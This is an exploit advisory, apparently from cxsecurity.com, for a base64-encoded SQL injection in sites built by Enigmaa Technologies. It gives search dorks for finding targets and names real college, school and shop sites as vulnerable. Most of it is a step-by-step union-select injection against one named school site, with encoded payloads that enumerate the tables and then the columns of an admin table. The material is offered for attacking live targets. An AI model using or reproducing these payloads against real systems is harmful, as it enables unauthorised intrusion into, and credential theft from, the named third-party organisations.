Engineered by Enigmaa Technologies group BASE64 Sql injection Vulnerability

2019.04.08
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

=================================================================================================== # Ttitle : Engineered by Enigmaa Technologies group BASE64 Sql injection Vulnerability # Author : Dj3Bb4rAn0n (bassem) FB/djebbar.bassem.16 # Date : /05/04/2019/ # Home : Annaba ( algeria ) # Tested on : Linux ( backbox ) # Vendor : Enigmaa Technologies group # Dorks : Engineered by : Enigmaa Tech Group | Powered by Enigmaa Technologies | Designed by Sphinx Technology =================================================================================================== PoC : Admin panel path : site.com/admin/login/ ----------------------- [ + ] Search in google using dorks above [ + ] Payload [ ' ] [ + ] Choose your target and look for injection point [ Encoded with base64 ] Ex: www.bhbcollege.ac.in/fac.php?id=MTU= <====== Inject here ####################### Example of vulnerable sites : ###################### [ + ] www.bhbcollege.ac.in/fac.php?id=MTU= [ + ] www.bookmypuja.in/book.php?id=MzU= [ + ] iconacademy.org/view.php?id=25 [ + ] www.krdcollege.in/view.php?id=23 [ + ] hdiedupublishers.com/product.php?id=63 ############ Demo ############ # www.navjyotiroyalheritageschool.in/read.php?id=NTA= # www.navjyotiroyalheritageschool.in/read.php?id=[BASE64]=50'] # www.navjyotiroyalheritageschool.in/read.php?id=[BASE64]=50'] # www.navjyotiroyalheritageschool.in/read.php?id=[BASE64]=50' -- -] Fixable : ' -- - Columns number is 12 : ----------------------------- # www.navjyotiroyalheritageschool.in/read.php?id=[BASE64]=50' order by 12 -- -] Vulnerable columns is : 3 | 4 | 6 | 11 | 12 | ----------------------------------------------------- # www.navjyotiroyalheritageschool.in/read.php?id=[BASE64]=-50' Union Select 1,2,3,4,5,6,7,8,9,10,11,12 -- -] Database | Version | user | Hostamne : ------------------------------------------------ # www.navjyotiroyalheritageschool.in/read.php?id=[BASE64]=-50' Union Select 1,2,concat(database(),0x3c62723e,@@version,0x3c62723e,user(),0x3c62723e,@@Hostname),4,5,6,7,8,9,10,11,12 -- -] Tables : [ Encoded with base64] ---------- # www.navjyotiroyalheritageschool.in/read.php?id=LTUwJyAgVW5pb24gU2VsZWN0IDEsMixncm91cF9jb25jYXQoMHgzYzYyNzIzZSx0YWJsZV9uYW1lKSw0LDUsNiw3LDgsOSwxMCwxMSwxMiBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSJta2NvbGN4Zl9uYXYiICAtLSAt columns : [ Encoded with base64] ------------ # http://www.navjyotiroyalheritageschool.in /read.php?id=LTUwJyAgVW5pb24gU2VsZWN0IDEsMixncm91cF9jb25jYXQoMHgzYzYyNzIzZSxjb2x1bW5fbmFtZSksNCw1LDYsNyw4LDksMTAsMTEsMTIgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSJhZG1pbiIgIC0tIC0= ######## Greetz to : Lakarha_23 | mohammed pazzo | Ja gar #######


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top